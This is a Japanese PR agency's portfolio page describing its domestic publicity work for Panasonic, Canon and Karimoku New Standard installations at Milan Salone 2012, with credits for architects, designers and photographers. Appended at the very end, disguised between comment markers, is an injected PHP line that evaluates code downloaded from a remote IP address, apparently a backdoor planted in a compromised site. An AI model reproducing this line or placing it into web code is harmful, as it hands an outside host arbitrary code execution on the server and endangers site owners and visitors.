デイリープレス

Milan Salone 2012

パナソニック エコソリューションズ社 

Photosynthesis
循環可能な新しいエネルギーの時代を表現するインスタレーション。太陽光パネルによる「創エネ」、蓄電池による「蓄エネ」、LEDや有機ELなどの照明による「省エネ」、またそれらをコントロールする「エネルギーマネジメント」を、生態循環系の起点である植物の光合成になぞらえた空間展示を行った。会場構成には生態系への視点を自らの建築・空間設計においても生かす、建築家、平田晃久氏。

日本国内向けのPRを担当。

Photo:Nacasa & Partners

Canon

Canon NEOREAL IN THE FOREST
入力から出力まで最先端クリエイティビティやプロのニーズに的確に応える機能を備えたキヤノンのデジタルイメージング技術を用い、中村竜治氏(建築家)、mintdesigns の勝井北斗氏と八木奈央氏(ファッションデザイナー)、志村信裕氏(映像アーティスト)、キヤノン総合デザインセンター デザインチーム4者によるインスタレーション。新たな表現の可能性に踏み込み、高精細な表現で未知の体験空間を表現。
日本国内向けのPRを担当。
写真 上 :「spring」Ryuji Nakamura × Nobujiro Shimura 
   下:「Fall in Pop」mintdesigns × Nobuhiro Shimura
Photo : Daisuke Ohki

KARIMOKU NEW STANDARD

「日常との共存」──日常の暮らしのなかに、いかに溶け込む家具をつくることができるか?
プロジェクトのスタートからテーマとして掲げる、普遍性、日常性を、ミラノ旧市街地にある、現在はギャラリーとして使われている築100年を超えるアパートメントを会場に表現。新たに3組のデザイナーを迎え、3回目のミラノサローネへの出展となった。
日本国内向けの他、海外のPR事務所とリレーションを組み、PRを行った。
http://www.karimoku-newstandard.jp/
Photo:Takumi Ota

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>